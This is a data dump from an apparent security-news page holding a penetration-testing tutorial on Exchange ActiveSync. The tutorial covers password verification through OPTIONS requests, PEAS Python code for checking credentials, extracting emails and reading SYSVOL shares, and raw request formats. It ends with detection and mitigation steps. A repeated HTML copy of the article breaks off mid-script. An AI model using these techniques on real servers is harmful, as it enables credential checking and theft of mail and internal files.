[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwD6oI_MsGyzDsYmUUdcfHf0Fjq9j1bSDiV2pAsRPgoc":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},561,"How can an attacker verify a user's mailbox password through Exchange ActiveSync?","An attacker can verify credentials by sending an OPTIONS request to the default EAS URL (`\u002FMicrosoft-Server-ActiveSync`) with HTTP Basic Authentication. If the credentials are valid, the server returns a 200 status code. This technique is often used as the first step in a broader attack, such as accessing internal file shares. The article provides Python code examples for automating this verification, which is a foundational step in the [PEAS tool](https:\u002F\u002Fgithub.com\u002FFSecureLABS\u002Fpeas).","\u003Cp>An attacker can verify credentials by sending an OPTIONS request to the default EAS URL (`\u002FMicrosoft-Server-ActiveSync`) with HTTP Basic Authentication. If the credentials are valid, the server returns a 200 status code. This technique is often used as the first step in a broader attack, such as accessing internal file shares. The article provides Python code examples for automating this verification, which is a foundational step in the [PEAS tool](https:\u002F\u002Fgithub.com\u002FFSecureLABS\u002Fpeas).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-accessing-internal-file-shares-via-exchange-activesync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-an-attacker-verify-a-users-mailbox-password-through-exchange-activesync-1777482960195","password verification, OPTIONS method, HTTP Basic Authentication, credential bruteforce, Exchange ActiveSync",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},138,"Penetration Techniques - Accessing Internal File Shares via Exchange ActiveSync","penetration-techniques-accessing-internal-file-shares-via-exchange-activesync","Learn how to access internal file shares through Exchange ActiveSync vulnerabilities. Includes password verification, open-source testing, and defense strategies for Exchange security.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Exchange ActiveSync is a Microsoft Exchange synchronization protocol used to synchronize mail resources between a mail server and mobile devices.\u003C\u002Fp>\u003Cp>Adam Rutherford and David Chismon introduced a method for accessing internal file shares through Exchange ActiveSync in their article.\u003C\u002Fp>\u003Cp>Article URL:\u003C\u002Fp>\u003Cp>https:\u002F\u002Flabs.f-secure.com\u002Farchive\u002Faccessing-internal-fileshares-through-exchange-activesync\u002F\u003C\u002Fp>\u003Cp>Based on their research, this article will detail accessing internal file shares via Exchange ActiveSync and document research insights.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Authenticating user mailbox passwords via Exchange ActiveSync\u003C\u002Fli>\u003Cli>Testing Exchange ActiveSync open-source code\u003C\u002Fli>\u003Cli>Details of accessing internal file shares through Exchange ActiveSync\u003C\u002Fli>\u003Cli>Defense and detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basics\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Exchange ActiveSync is a Microsoft Exchange synchronization protocol optimized for high-latency and low-bandwidth networks.\u003C\u002Fp>\u003Cp>Based on HTTP and XML, this protocol enables mobile devices to access email, calendar, contacts, and tasks, and maintains access to this information while working offline.\u003C\u002Fp>\u003Cp>Simply put, computer users access mail resources via OWA (Outlook Web Access), while mobile users access mail resources via EAS (Exchange ActiveSync).\u003C\u002Fp>\u003Ch2>0x03 Verifying User Mailbox Passwords via Exchange ActiveSync\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Default corresponding URL: \u002FMicrosoft-Server-ActiveSync\u003C\u002Fp>\u003Cp>Can be accessed directly through a browser, prompting for username and password\u003C\u002Fp>\u003Cp>After entering the correct username and password, the returned content is as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017965627_0_7e7eb7bf5c.jpeg\">\u003C\u002Fp>\u003Cp>If no credentials are available, server information can be obtained directly via the wget command. Example command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wget https:\u002F\u002F192.168.1.1\u002FMicrosoft-Server-ActiveSync --no-check-certificate --debug\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The returned result is as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017969421_1_0c2c85b85f.jpeg\">\u003C\u002Fp>\u003Cp>To enable password verification through scripts, the OPTIONS method must be used here. If the credentials are valid, status code 200 is returned.\u003C\u002Fp>\u003Cp>Add HTTP Basic Authentication to the header section, with the format Authorization: Basic \u003Cstring>.\u003C\u002Fstring>\u003C\u002Fp>\u003Cp>\u003Cstring> is the base64-encoded string of \"username:password\".\u003C\u002Fstring>\u003C\u002Fp>\u003Cp>The complete Python implementation code has been uploaded to GitHub at the following address:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch2>0x04 Exchange ActiveSync Open Source Code Testing\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1.https:\u002F\u002Fgithub.com\u002Fsolbirn\u002FpyActiveSync\u003C\u002Fh3>\u003Cp>Requires Python2\u003C\u002Fp>\u003Cp>To perform normal testing, the following settings are also required:\u003C\u002Fp>\u003Cp>(1) Create a new file named proto_creds.py in the same directory\u003C\u002Fp>\u003Cp>Content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>as_server='192.168.1.1'\u003Cbr>as_user='user1'\u003Cbr>as_pass='password1'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Disable SSL certificate verification\u003C\u002Fp>\u003Cp>Modify pyActiveSync\\objects\\MSASHTTP.py\u003C\u002Fp>\u003Cp>Add import ssl\u003C\u002Fp>\u003Cp>Replace httplib.HTTPSConnection(self.server, self.port)\u003C\u002Fp>\u003Cp>with httplib.HTTPSConnection(self.server, self.port, context=ssl._create_unverified_context())\u003C\u002Fp>\u003Cp>(3) Modify pyActiveSync\u002Fdev_playground.py\u003C\u002Fp>\u003Cp>Remove code related to \"Suggested Contacts\"\u003C\u002Fp>\u003Cp>Run dev_playground.py and misc_tests.py separately for different functions\u003C\u002Fp>\u003Ch3>2. https:\u002F\u002Fgithub.com\u002FFSecureLABS\u002Fpeas\u003C\u002Fh3>\u003Cp>Requires Python2\u003C\u002Fp>\u003Cp>Based on pyActiveSync, added features for exporting emails and accessing shared files\u003C\u002Fp>\u003Cp>Common functions are as follows:\u003C\u002Fp>\u003Cp>(1) Verify credentials\u003C\u002Fp>\u003Cp>Code example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import peas\u003Cbr># Create an instance of the PEAS client.\u003Cbr>client = peas.Peas()\u003Cbr># Disable certificate verification so self-signed certificates don't cause errors.\u003Cbr>client.disable_certificate_verification()\u003Cbr># Set the credentials and server to connect to.\u003Cbr>client.set_creds({\u003Cbr>    'server': '192.168.1.1',\u003Cbr>    'user': 'test1',\u003Cbr>    'password': '123456789',\u003Cbr>})\u003Cbr>\u003Cbr># Check the credentials are accepted.\u003Cbr>print(\"Auth result:\", client.check_auth())\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Read emails\u003C\u002Fp>\u003Cp>Code example for reading inbox emails:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import peas\u003Cbr>import re\u003Cbr># Create an instance of the PEAS client.\u003Cbr>client = peas.Peas()\u003Cbr># Disable certificate verification so self-signed certificates don't cause errors.\u003Cbr>client.disable_certificate_verification()\u003Cbr># Set the credentials and server to connect to.\u003Cbr>client.set_creds({\u003Cbr>    'server': '192.168.1.1',\u003Cbr>    'user': 'test1',\u003Cbr>    'password': '123456789',\u003Cbr>})\u003Cbr># Retrieve emails.\u003Cbr>emails = client.extract_emails()\u003Cbr>for email in emails :\u003Cbr>    print(\"\\r\\n\")\u003Cbr>    pattern_data = re.compile(r\"\u003Cemail:to>(.*?)\u003C\u002Femail:to>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"To:\"+data[0])\u003Cbr>    pattern_data = re.compile(r\"\u003Cemail:from>(.*?)\u003C\u002Femail:from>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"From:\"+data[0])\u003Cbr>    pattern_data = re.compile(r\"\u003Cemail:subject>(.*?)\u003C\u002Femail:subject>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"Subject:\"+data[0])\u003Cbr>    pattern_data = re.compile(r\"\u003Cemail:datereceived>(.*?)\u003C\u002Femail:datereceived>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"DateReceived:\"+data[0])\u003Cbr>    pattern_data = re.compile(r\"\u003Cemail:displayto>(.*?)\u003C\u002Femail:displayto>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"DisplayTo:\"+data[0])\u003Cbr>    pattern_data = re.compile(r\"\u003Cemail:threadtopic>(.*?)\u003C\u002Femail:threadtopic>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"ThreadTopic:\"+data[0])\u003Cbr>    pattern_data = re.compile(r\"\u003Cemail:importance>(.*?)\u003C\u002Femail:importance>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"Importance:\"+data[0])\u003Cbr>    pattern_data = re.compile(r\"\u003Cemail:read>(.*?)\u003C\u002Femail:read>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"Read:\"+data[0])\u003Cbr>    pattern_data = re.compile(r\"\u003Cairsyncbase:displayname>(.*?)\u003C\u002Fairsyncbase:displayname>\")\u003Cbr>    \u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    for name in data :\u003Cbr>        print(\"Attachment:\"+name)\u003Cbr>  \u003Cbr>    pattern_data = re.compile(r\"\u003Cemail2:conversationindex>(.*?)\u003C\u002Femail2:conversationindex>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"ConversationIndex:\"+data[0])\u003Cbr>\u003Cbr>    index1 = email.find('')\u003Cbr>    index2 = email.find('')\u003Cbr>    filename = data[0] + \".html\"\u003Cbr>    print('[+] Save body to %s'%(filename))\u003Cbr>    with open(filename, 'w+') as file_object:\u003Cbr>            file_object.write(email[index1:index2+7]) \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>It should be noted that the returned email content has the body part in HTML format. My code extracts the body section and saves it as an HTML file, using the unique ConversationIndex as the filename.\u003C\u002Fp>\u003Cp>To obtain information from the sent mail folder, modifications need to be made to py_activesync_helper.py. For details on the changes, refer to https:\u002F\u002Fgithub.com\u002Fsolbirn\u002FpyActiveSync\u002Fblob\u002Fmaster\u002FpyActiveSync\u002Fdev_playground.py#L150\u003C\u002Fp>\u003Cp>(3) Accessing file shares\u003C\u002Fp>\u003Cp>Code example for listing shared files:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import peas\u003Cbr># Create an instance of the PEAS client.\u003Cbr>client = peas.Peas()\u003Cbr># Disable certificate verification so self-signed certificates don't cause errors.\u003Cbr>client.disable_certificate_verification()\u003Cbr># Set the credentials and server to connect to.\u003Cbr>client.set_creds({\u003Cbr>    'server': '192.168.1.1',\u003Cbr>    'user': 'test1',\u003Cbr>    'password': '123456789',\u003Cbr>})\u003Cbr># Retrieve a file share directory listing.\u003Cbr>listing = client.get_unc_listing(r'\\\\dc1\\SYSVOL')\u003Cbr>for data in listing :\u003Cbr>   print(\"\\r\\n\")\u003Cbr>   for key,value in data.items():\u003Cbr>      print('{key}:{value}'.format(key = key, value = value))\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Code example for reading the content of a specified shared file:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import peas\u003Cbr># Create an instance of the PEAS client.\u003Cbr>client = peas.Peas()\u003Cbr># Disable certificate verification so self-signed certificates don't cause errors.\u003Cbr>client.disable_certificate_verification()\u003Cbr># Set the credentials and server to connect to.\u003Cbr>client.set_creds({\u003Cbr>    'server': '192.168.1.1',\u003Cbr>    'user': 'test1',\u003Cbr>    'password': '123456789',\u003Cbr>})\u003Cbr>\u003Cbr>data=client.get_unc_file(r'\\\\\\\\dc1\\\\SYSVOL\\\\test.com\\\\Policies\\\\{6AC1786C-016F-11D2-945F-00C04fB984F9}\\\\GPT.INI')\u003Cbr>print(data)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x05 Details of accessing internal file shares via Exchange ActiveSync\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. List shared files\u003C\u002Fh3>\u003Cp>Example of accessed URL:\u003C\u002Fp>\u003Cp>https:\u002F\u002F192.168.1.1\u002FMicrosoft-Server-ActiveSync?Cmd=Search&amp;User=test1&amp;DeviceId=123456&amp;DeviceType=Python\"\u003C\u002Fp>\u003Cp>Parameter descriptions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Cmd=Search indicates the command type is Search\u003C\u002Fli>\u003Cli>User=test1 indicates the username is test1\u003C\u002Fli>\u003Cli>DeviceId=123456 indicates the device ID, which will be recorded by Exchange ActiveSync\u003C\u002Fli>\u003Cli>DeviceType=Python indicates the device type, which will be recorded by Exchange ActiveSync\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The method is a POST request\u003C\u002Fp>\u003Cp>Example of header content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\"Content-Type\": \"application\u002Fvnd.ms-sync.wbxml\",\u003Cbr>\"User-Agent\" : ,\u003Cbr>\"MS-ASProtocolVersion\" : \"14.1\",\u003Cbr>\"Accept-Language\" : \"en_us\",\u003Cbr>\"Authorization: Basic dXNlcjElM0FwYXNzd29yZDE=\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example of body content:\u003C\u002Fp>\u003Cp>Need to convert XML format to WAP Binary XML (WBXML)\u003C\u002Fp>\u003Cp>XML format example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp> \u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr> \u003C\u002Fp>\u003Csearch xmlns=\"Search:\" xmlns:documentlibrary=\"DocumentLibrary:\">\u003Cbr>   \u003Cstore>\u003Cbr>     \u003Cname>DocumentLibrary\u003C\u002Fname>\u003Cbr>     \u003Cquery>\u003Cbr>       \u003Cequalto>\u003Cbr>         \u003Cdocumentlibrary:linkid>\u003Cbr>         \u003Cvalue>\\\\myserver\\myshare\u003C\u002Fvalue>\u003Cbr>       \u003C\u002Fdocumentlibrary:linkid>\u003C\u002Fequalto>\u003Cbr>     \u003C\u002Fquery>\u003Cbr>     \u003Coptions>\u003Cbr>       \u003Crange>0-999\u003C\u002Frange>\u003Cbr>     \u003C\u002Foptions>\u003Cbr>   \u003C\u002Fstore>\u003Cbr> \u003C\u002Fsearch>\u003Cp>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>XML format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fexchange_server_protocols\u002Fms-asdoc\u002Ff8a23578-0ca4-4b36-aa07-3dcac5b83881\u003C\u002Fp>\u003Cp>WAP Binary XML (WBXML) algorithm reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fexchange_server_protocols\u002Fms-aswbxml\u002F39973eb1-1e40-4eb5-ac74-42781c5a33bc\u003C\u002Fp>\u003Ch3>2. Read the content of a specified shared file\u003C\u002Fh3>\u003Cp>Example URL for access: https:\u002F\u002F192.168.1.1\u002FMicrosoft-Server-ActiveSync?Cmd=ItemOperations&amp;User=test1&amp;DeviceId=123456&amp;DeviceType=Python\"\u003C\u002Fp>\u003Cp>Parameter descriptions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Cmd=ItemOperations, indicating the command type is ItemOperations\u003C\u002Fli>\u003Cli>User=test1, indicating the username is test1\u003C\u002Fli>\u003Cli>DeviceId=123456, indicating the device ID, which will be recorded by Exchange ActiveSync\u003C\u002Fli>\u003Cli>DeviceType=Python, indicating the device type, which will be recorded by Exchange ActiveSync\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The method is a POST request\u003C\u002Fp>\u003Cp>Header content example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\"Content-Type\": \"application\u002Fvnd.ms-sync.wbxml\",\u003Cbr>\"User-Agent\" : ,\u003Cbr>\"MS-ASProtocolVersion\" : \"14.1\",\u003Cbr>\"Accept-Language\" : \"en_us\",\u003Cbr>\"Authorization: Basic dXNlcjElM0FwYXNzd29yZDE=\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Body content example:\u003C\u002Fp>\u003Cp>Need to convert XML format to WAP Binary XML (WBXML)\u003C\u002Fp>\u003Cp>XML format example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr> \u003Citemoperations xmlns:documentlibrary=\"DocumentLibrary:\" xmlns=\"ItemOperations:\">\u003Cbr>   \u003Cfetch>\u003Cbr>       \u003Cstore>DocumentLibrary\u003C\u002Fstore>\u003Cbr>       \u003Cdocumentlibrary:linkid>\\\\EXCH-D-810\\DocumentShare\\Word Document.docx\u003C\u002Fdocumentlibrary:linkid>\u003Cbr>   \u003C\u002Ffetch>\u003Cbr> \u003C\u002Fitemoperations>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>XML format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fexchange_server_protocols\u002Fms-asdoc\u002Fe7a91040-42f1-475c-bac3-d83d7dd9652f\u003C\u002Fp>\u003Cp>Based on the peas code, I extracted the shared file access functionality and created a portable version. The address is as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The code supports two functions:\u003C\u002Fp>\u003Col>\u003Cli>List shared files\u003C\u002Fli>\u003Cli>Read the content of a specified shared file\u003C\u002Fli>\u003C\u002Fol>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When accessing the domain shared directory SYSVOL, the path must include the domain controller's computer name, not the domain name\u003C\u002Fp>\u003Cp>Correct format:\u003C\u002Fp>\u003Cp>\\\\dc1\\SYSVOL\\test.com\\Policies\\{6AC1786C-016F-11D2-945F-00C04fB984F9}\\GPT.INI\u003C\u002Fp>\u003Cp>Incorrect format:\u003C\u002Fp>\u003Cp>\\\\test.com\\SYSVOL\\test.com\\Policies\\{6AC1786C-016F-11D2-945F-00C04fB984F9}\\GPT.INI\u003C\u002Fp>\u003Cp>If you have the domain controller's computer name, you can access files in the domain shared directory SYSVOL from the external network via Exchange ActiveSync\u003C\u002Fp>\u003Ch2>0x06 Defense Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Reading emails and accessing shared directories via Exchange ActiveSync leaves device information. Code location for device information:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FFSecureLABS\u002Fpeas\u002Fblob\u002Fmaster\u002Fpeas\u002FpyActiveSync\u002Fobjects\u002FMSASHTTP.py#L25\u003C\u002Fp>\u003Cp>Two methods to view device information\u003C\u002Fp>\u003Cp>1. Log in to Exchange Admin Center\u003C\u002Fp>\u003Cp>Select mailbox user -&gt; View details under Mobile Devices, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017975828_2_46cc3e7356.jpeg\">\u003C\u002Fp>\u003Cp>2. Use Exchange Management Shell\u003C\u002Fp>\u003Cp>Command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-ActiveSyncDevice|fl UserDisplayName,DeviceId,DeviceType,DeviceUserAgent\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Log location for accessing shared files via Exchange ActiveSync:\u003C\u002Fp>\u003Cp>%ExchangeInstallPath%Logging\\HttpProxy\\Eas\u003C\u002Fp>\u003Cp>Method to disable accessing shared files via Exchange ActiveSync:\u003C\u002Fp>\u003Cp>Use Exchange Management Shell, command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Set-MobileDeviceMailboxPolicy -Identity:Default -UNCAccessEnabled:$false -WSSAccessEnabled:$false\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fpowershell\u002Fmodule\u002Fexchange\u002Fset-mobiledevicemailboxpolicy?view=exchange-ps\u003C\u002Fp>\u003Cp>Command to view configuration: Get-MobileDeviceMailboxPolicy |fl\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article details accessing internal file shares via Exchange ActiveSync, extracts the file-sharing access functionality based on peas code, generates a portable version, and provides defense recommendations along with exploitation approaches.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Exchange ActiveSync is a Microsoft Exchange synchronization protocol used to synchronize mail resources between a mail server and mobile devices.\u003C\u002Fp>\u003Cp>Adam Rutherford and David Chismon introduced a method for accessing internal file shares through Exchange ActiveSync in their article.\u003C\u002Fp>\u003Cp>Article URL:\u003C\u002Fp>\u003Cp>https:\u002F\u002Flabs.f-secure.com\u002Farchive\u002Faccessing-internal-fileshares-through-exchange-activesync\u002F\u003C\u002Fp>\u003Cp>Based on their research, this article will detail accessing internal file shares via Exchange ActiveSync and document research insights.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Authenticating user mailbox passwords via Exchange ActiveSync\u003C\u002Fli>\u003Cli>Testing Exchange ActiveSync open-source code\u003C\u002Fli>\u003Cli>Details of accessing internal file shares through Exchange ActiveSync\u003C\u002Fli>\u003Cli>Defense and detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basics\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Exchange ActiveSync is a Microsoft Exchange synchronization protocol optimized for high-latency and low-bandwidth networks.\u003C\u002Fp>\u003Cp>Based on HTTP and XML, this protocol enables mobile devices to access email, calendar, contacts, and tasks, and maintains access to this information while working offline.\u003C\u002Fp>\u003Cp>Simply put, computer users access mail resources via OWA (Outlook Web Access), while mobile users access mail resources via EAS (Exchange ActiveSync).\u003C\u002Fp>\u003Ch2>0x03 Verifying User Mailbox Passwords via Exchange ActiveSync\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Default corresponding URL: \u002FMicrosoft-Server-ActiveSync\u003C\u002Fp>\u003Cp>Can be accessed directly through a browser, prompting for username and password\u003C\u002Fp>\u003Cp>After entering the correct username and password, the returned content is as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017965627_0_7e7eb7bf5c-1.jpeg\">\u003C\u002Fp>\u003Cp>If no credentials are available, server information can be obtained directly via the wget command. Example command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wget https:\u002F\u002F192.168.1.1\u002FMicrosoft-Server-ActiveSync --no-check-certificate --debug\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The returned result is as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017969421_1_0c2c85b85f-1.jpeg\">\u003C\u002Fp>\u003Cp>To enable password verification through scripts, the OPTIONS method must be used here. If the credentials are valid, status code 200 is returned.\u003C\u002Fp>\u003Cp>Add HTTP Basic Authentication to the header section, with the format Authorization: Basic \u003Cstring>.\u003C\u002Fstring>\u003C\u002Fp>\u003Cp>\u003Cstring> is the base64-encoded string of \"username:password\".\u003C\u002Fstring>\u003C\u002Fp>\u003Cp>The complete Python implementation code has been uploaded to GitHub at the following address:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch2>0x04 Exchange ActiveSync Open Source Code Testing\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1.https:\u002F\u002Fgithub.com\u002Fsolbirn\u002FpyActiveSync\u003C\u002Fh3>\u003Cp>Requires Python2\u003C\u002Fp>\u003Cp>To perform normal testing, the following settings are also required:\u003C\u002Fp>\u003Cp>(1) Create a new file named proto_creds.py in the same directory\u003C\u002Fp>\u003Cp>Content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>as_server='192.168.1.1'\u003Cbr>as_user='user1'\u003Cbr>as_pass='password1'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Disable SSL certificate verification\u003C\u002Fp>\u003Cp>Modify pyActiveSync\\objects\\MSASHTTP.py\u003C\u002Fp>\u003Cp>Add import ssl\u003C\u002Fp>\u003Cp>Replace httplib.HTTPSConnection(self.server, self.port)\u003C\u002Fp>\u003Cp>with httplib.HTTPSConnection(self.server, self.port, context=ssl._create_unverified_context())\u003C\u002Fp>\u003Cp>(3) Modify pyActiveSync\u002Fdev_playground.py\u003C\u002Fp>\u003Cp>Remove code related to \"Suggested Contacts\"\u003C\u002Fp>\u003Cp>Run dev_playground.py and misc_tests.py separately for different functions\u003C\u002Fp>\u003Ch3>2. https:\u002F\u002Fgithub.com\u002FFSecureLABS\u002Fpeas\u003C\u002Fh3>\u003Cp>Requires Python2\u003C\u002Fp>\u003Cp>Based on pyActiveSync, added features for exporting emails and accessing shared files\u003C\u002Fp>\u003Cp>Common functions are as follows:\u003C\u002Fp>\u003Cp>(1) Verify credentials\u003C\u002Fp>\u003Cp>Code example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import peas\u003Cbr># Create an instance of the PEAS client.\u003Cbr>client = peas.Peas()\u003Cbr># Disable certificate verification so self-signed certificates don't cause errors.\u003Cbr>client.disable_certificate_verification()\u003Cbr># Set the credentials and server to connect to.\u003Cbr>client.set_creds({\u003Cbr>    'server': '192.168.1.1',\u003Cbr>    'user': 'test1',\u003Cbr>    'password': '123456789',\u003Cbr>})\u003Cbr>\u003Cbr># Check the credentials are accepted.\u003Cbr>print(\"Auth result:\", client.check_auth())\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Read emails\u003C\u002Fp>\u003Cp>Code example for reading inbox emails:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import peas\u003Cbr>import re\u003Cbr># Create an instance of the PEAS client.\u003Cbr>client = peas.Peas()\u003Cbr># Disable certificate verification so self-signed certificates don't cause errors.\u003Cbr>client.disable_certificate_verification()\u003Cbr># Set the credentials and server to connect to.\u003Cbr>client.set_creds({\u003Cbr>    'server': '192.168.1.1',\u003Cbr>    'user': 'test1',\u003Cbr>    'password': '123456789',\u003Cbr>})\u003Cbr># Retrieve emails.\u003Cbr>emails = client.extract_emails()\u003Cbr>for email in emails :\u003Cbr>    print(\"\\r\\n\")\u003Cbr>    pattern_data = re.compile(r\"\u003Cemail:to>(.*?)\u003C\u002Femail:to>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"To:\"+data[0])\u003Cbr>    pattern_data 